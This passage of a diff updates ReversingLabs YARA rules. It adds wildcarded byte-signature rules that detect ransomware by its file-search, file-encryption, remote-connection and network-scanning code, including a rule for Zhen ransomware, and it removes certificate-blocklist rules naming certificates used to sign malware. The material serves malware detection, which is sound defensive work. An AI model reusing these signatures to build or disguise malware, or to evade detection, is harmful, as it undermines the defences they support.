+            7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 89 75 ??
+            8B 5D ?? 89 5D ?? 83 FE ?? 75 ?? 85 DB 0F 84 ?? ?? ?? ?? 8B CE 0B CB 0F 84 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 53 56 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 33 C9
+            03 C6 13 CB 83 E8 ?? 89 45 ?? 83 D9 ?? 89 4D ?? 6A ?? 8B 55 ?? 52 6A ?? 6A ?? 6A ??
+            57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 6A ?? FF 15 ??
+            ?? ?? ?? 83 C4 ?? 8B F0 66 0F 57 C0 66 0F 13 45 ?? 8B 5D ?? 8B 7D ?? 90 83 7D ?? ??
+            0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B D3 83 C2 ?? 8B 75 ?? 8B CE
+            83 D1 ?? 8B 45 ?? 3B C8 7F ?? 7C ?? 3B 55 ?? 77 ?? BF ?? ?? ?? ?? 33 C0 8B 75 ?? 03
+        }
+		$encrypt_files_p2 = {
+            F3 8B DA 89 4D ?? EB ?? 8B 7D ?? 2B FB 1B C6 8B 55 ?? 8D 34 13 03 DF 11 45 ?? 89 5D
+            ?? 89 45 ?? 89 7D ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ?? 8B 4D ?? 89 4D ?? 83
+            F9 ?? 7D ?? C6 04 31 ?? 41 EB ?? 29 7D ?? 19 45 ?? 33 C0 89 45 ?? 83 F8 ?? 7D ?? 8B
+            0C 85 ?? ?? ?? ?? 31 0C 86 40 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 74
+            ?? 88 04 37 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 01
+            0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 0D ?? ?? ?? ?? 51 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? EB ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF
+            15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 15 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B
+            4D ?? 8D 95 ?? ?? ?? ?? 0F B7 01 66 89 02 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 6A ?? 8D
+            95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 74 ?? 8B D0 8D B5 ?? ?? ?? ??
+            0F B7 0A 66 89 0E 83 C2 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C9 66 89 08 8D 95 ?? ?? ?? ??
+            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ??
+            ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF
+            15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? EB ?? B8 ?? ?? ?? ?? C3 8B 65 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+        }
+		$search_files_p1 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 33 D2 56 50 66 89 94 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 56 52
+            66 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 56 50 89
+            74 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 68
+            ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8D 94 24 ?? ?? ?? ?? 8B C7 2B D7 8D 9B ?? ?? ?? ?? 0F B7 08 66 89 0C 02 83 C0
+            ?? 66 3B CE 75 ?? 8D 84 24 ?? ?? ?? ?? 83 C0 ?? 8D A4 24 ?? ?? ?? ?? 66 8B 48 ?? 83
+            C0 ?? 66 3B CE 75 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 08 66 8B 0D ?? ?? ?? ??
+            89 50 ?? 68 ?? ?? ?? ?? 66 89 48 ?? FF 15 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ??
+            ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5
+            5D C2 ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 68 ??
+            ?? ?? ?? 51 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 68 ?? ?? ?? ??
+            52 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8D 44 24
+            ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 84 ?? ?? ?? ?? 66 83 3D ?? ??
+            ?? ?? ?? BF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C7 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66
+            8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8B CB D1 F8 8D 71 ?? 66 8B 11 83 C1 ?? 66 85 D2
+        }
+		$search_files_p2 = {
+            75 ?? 2B CE D1 F9 3B C1 75 ?? 53 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 66 8B 0F
+            83 C7 ?? 66 85 C9 75 ?? 66 39 0F 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 64 8B 15 ?? ?? ?? ?? 8B 32 8B 55 ?? 83 C4 ?? 8D 4C 24 ?? 51 52 68 ?? ?? ?? ?? 50
+            89 46 ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 7D ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8B 4E ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? 89 04 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF
+            D3 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8B 56 ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D3 8B 0D ?? ?? ?? ?? 89
+            04 8D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8D 4C 24 ?? 51 57 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 48 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D6 83 C4 ?? 85
+            C0 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8D 9B ?? ?? ?? ?? 0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83
+            C0 ?? 66 85 C9 75 ?? 8D BC 24 ?? ?? ?? ?? 83 C7 ?? 66 8B 47 ?? 83 C7 ?? 66 85 C0 75
+            ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5
+            FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 52
+            50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 15
+      }
+		$remote_connection = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 0F B6 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 3D ??
+            ?? ?? ?? 8D 70 ?? 8B 00 56 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 52 0F B7 15 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 51 52 50
+            6A ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D7 83 C4 ?? 80 3E ?? 74 ?? B9 ?? ?? ??
+            ?? 8B C6 EB ?? 8D 49 ?? C6 00 ?? 40 49 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 8D 8D ?? ?? ?? ?? 51 2B C2
+            50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF D7 8D 85 ??
+            ?? ?? ?? 83 C4 ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 2B C2 50 8D 85 ?? ?? ?? ?? 50
+            53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? C6 00 ?? 40
+            49 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2
+      }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insta Software Solution Inc." and ( pe.signatures [ i ] . serial == "00:1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" or pe.signatures [ i ] . serial == "1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" ) and 1601733106 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $remote_connection and ( all of ( $search_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_75Cf729F8A740Bbdef183A1C4D86A02F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Zhen : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Zhen ransomware."
 		author = "ReversingLabs"
-		id = "e96fdf57-3884-526e-a704-93e783c95241"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "ce6bc48d-934b-582c-8ce7-3dd595cbf5dd"
+		date = "2021-04-28"
+		modified = "2021-04-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6444-L6460"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "691fadaa653ecd29e60f2db39b7c5154d7c85f388f72eccd0a4b5fe42eaee0dd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Zhen.yara#L1-L176"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "17b24e7baeccd90b8695eb8d21d9ee4a317806ed7713252d315d06bee3f93e65"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Zhen"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbor LLC" and pe.signatures [ i ] . serial == "75:cf:72:9f:8a:74:0b:bd:ef:18:3a:1c:4d:86:a0:2f" and 1604223894 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_2F64677254D3844Efdac2922123D05D1 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "de9ef02d-a723-5013-9f91-e394edc23855"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6462-L6478"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f9f1f629e03563ece0fe5186b199e2f030dce7f58fb259de1aeb7387c76fa902"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B 41 ?? C1 E0 ?? 8B 4D ?? 8B 49 ?? 03 C8 FF 15
+            ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? FF 15 ?? ??
+            ?? ?? 8D 55 ?? 8B 4D ?? 83 C1 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
+            4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
+            E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D
+        }
+		$find_files_p2 = {
+            8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55
+            ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8
+            ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 11 89 95 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B 4D ?? 89 48 ?? 8B 55
+            ?? 89 50 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B
+            4D ?? 89 48 ?? 8B 55 ?? 89 50 ?? 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 91
+            ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? EB ?? 8D
+            4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ??
+            ?? C3 C3 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
+            5F 5E 5B 8B E5 5D C2
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 66 89 45 ?? 8D 4D ?? FF 15 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 52 66 8B 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 6A ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 E8 ?? 50 6A ?? 6A ??
+            8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66
+            8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B
+            55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 8B
+            02 8B 4D ?? 51 FF 50 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52
+            8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 66 89 45
+            ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 8B 02 50 66 8B 4D ?? 51
+        }
+		$encrypt_files_p2 = {
+            6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? FF 15 ??
+            ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 89 45 ?? 83 7D
+            ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ??
+            EB ?? C7 45 ?? ?? ?? ?? ?? 66 8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 8D 45 ?? 50 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? FF 15
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 8B 45 ?? 8B 08 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 50 8B 45 ?? 8B 08 51 8D 55 ?? 52
+            FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15
+            ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ??
+            FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D
+            ?? FF 15 ?? ?? ?? ?? C3 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15
+            ?? ?? ?? ?? C3 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B
+            45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$scan_network_p1 = {
+            55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52
+            FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 4D ?? 51 8B
+            95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ??
+            83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? FF
+            15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D
+            4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D
+            45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D
+            4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ??
+            8B 08 8B 55 ?? 52 FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2
+            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF
+        }
+		$scan_network_p2 = {
+            15 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF
+            15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
+            ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ??
+            ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82
+            50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 2B
+            51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ?? B9
+            ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
+            ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B
+            42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA
+            ?? ?? ?? ?? 2B 51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
